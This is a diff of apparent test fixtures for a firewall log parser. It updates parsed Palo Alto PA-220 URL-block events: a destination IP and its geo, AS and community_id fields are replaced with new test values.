@@ -1440,7 +1458,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:BilmVEwf9nQIXodvin3X6lZuVAc=" + "community_id": "1:GeMJJ22IjqKEREFWH9ujsC40jOM=" } }, "threat_category": "unknown", @@ -1485,8 +1503,8 @@ ], "network": { "community_id": [ - "1:UDkY52oWrSsYAqwPSTAKyKhwzvQ=", - "1:BilmVEwf9nQIXodvin3X6lZuVAc=" + "1:VYpbhu7GfNUjHQ4icqy9IeYHUUs=", + "1:GeMJJ22IjqKEREFWH9ujsC40jOM=" ], "transport": "tcp", "application": "ssl", @@ -1525,14 +1543,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767747167Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691703400Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -1555,26 +1573,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1590,14 +1610,14 @@ "port": 52991, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -1612,7 +1632,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:CmZ6KkZzaxpkJHXJn0lNskvvZLA=" + "community_id": "1:5rwb8J6rmssdijg+3ykoVWJmGIk=" } }, "threat_category": "unknown", @@ -1657,8 +1677,8 @@ ], "network": { "community_id": [ - "1:pWCQCkwDKmw2APwAJ2GcT6QNXQg=", - "1:CmZ6KkZzaxpkJHXJn0lNskvvZLA=" + "1:JceyMqOZwQcAC72gCLYjEBvknTU=", + "1:5rwb8J6rmssdijg+3ykoVWJmGIk=" ], "transport": "tcp", "application": "ssl", @@ -1697,14 +1717,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767751357Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691709700Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -1727,26 +1747,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1762,14 +1784,14 @@ "port": 52994, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -1784,7 +1806,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:Xy6vXuBmLPx1/PDpu/KMI1ZPnW0=" + "community_id": "1:OAkTnLpglosxVTnxgz9yCJ+kNKU=" } }, "threat_category": "unknown", @@ -1829,8 +1851,8 @@ ], "network": { "community_id": [ - "1:3V7ODANn0gD6PFiGWb7LVZcr3TY=", - "1:Xy6vXuBmLPx1/PDpu/KMI1ZPnW0=" + "1:o2VUSGEGaUzspyZmCohGXq3Yp6c=", + "1:OAkTnLpglosxVTnxgz9yCJ+kNKU=" ], "transport": "tcp", "application": "ssl", @@ -1869,14 +1891,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767755350Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691716Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -1899,26 +1921,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1934,14 +1958,14 @@ "port": 52993, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -1956,7 +1980,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:nmxmtIja0z/MV5rgbBnScsKtW0U=" + "community_id": "1:14+dKaa+npbZrUoZzTEXAyUyalI=" } }, "threat_category": "unknown", @@ -2001,8 +2025,8 @@ ], "network": { "community_id": [ - "1:7WQBEq/QCPNFLId7r93vN98nPHQ=", - "1:nmxmtIja0z/MV5rgbBnScsKtW0U=" + "1:N1CGJBV+0yN9Cp8eJgHpxgGyEVA=", + "1:14+dKaa+npbZrUoZzTEXAyUyalI=" ], "transport": "tcp", "application": "ssl", @@ -2041,14 +2065,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767759816Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691721800Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -2071,26 +2095,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2106,14 +2132,14 @@ "port": 52995, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -2128,7 +2154,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:XNlHvX7cDGGCkvSS/aFHGg/RnAk=" + "community_id": "1:ed4O7fFnJ6AA/awMAUE+Im+hdNc=" } }, "threat_category": "unknown", @@ -2173,8 +2199,8 @@ ], "network": { "community_id": [ - "1:r3rve3ghPTa/BACcRlan0FEgZFw=", - "1:XNlHvX7cDGGCkvSS/aFHGg/RnAk=" + "1:CwI0KrtlUFKG8upcnDiYYE+GkUI=", + "1:ed4O7fFnJ6AA/awMAUE+Im+hdNc=" ], "transport": "tcp", "application": "ssl", @@ -2213,14 +2239,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767763873Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691725600Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -2243,26 +2269,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2278,14 +2306,14 @@ "port": 52996, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -2300,7 +2328,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:DqCF4BufQU/spPG8UYok6IrChWo=" + "community_id": "1:jp+mA7ZKjzFOY6ps3Rfq/Qx1GvE=" } }, "threat_category": "unknown", @@ -2345,8 +2373,8 @@ ], "network": { "community_id": [ - "1:2A2PtRAEa2EIbgp0B+6pQMVyM1o=", - "1:DqCF4BufQU/spPG8UYok6IrChWo=" + "1:GkRYVeH+1+wl9KsJ3K/KmY8oDEo=", + "1:jp+mA7ZKjzFOY6ps3Rfq/Qx1GvE=" ], "transport": "tcp", "application": "ssl", @@ -2385,14 +2413,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767767900Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691730700Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -2415,26 +2443,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2450,14 +2480,14 @@ "port": 52997, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -2472,7 +2502,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:lJHLfl+/x95GohXozN52zokIxvA=" + "community_id": "1:F4oaoq7MzD8qqnUI8lIfWI9TLuA=" } }, "threat_category": "unknown", @@ -2517,8 +2547,8 @@ ], "network": { "community_id": [ - "1:ttgSlbqHs+GKueSexHsquCbfjCk=", - "1:lJHLfl+/x95GohXozN52zokIxvA=" + "1:4sDj5hLfDuV0wr0fY/UoICr4zMI=", + "1:F4oaoq7MzD8qqnUI8lIfWI9TLuA=" ], "transport": "tcp", "application": "ssl", @@ -2557,14 +2587,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767771951Z", - "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691736400Z", + "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -2587,26 +2617,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -2622,14 +2654,14 @@ "port": 52998, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", 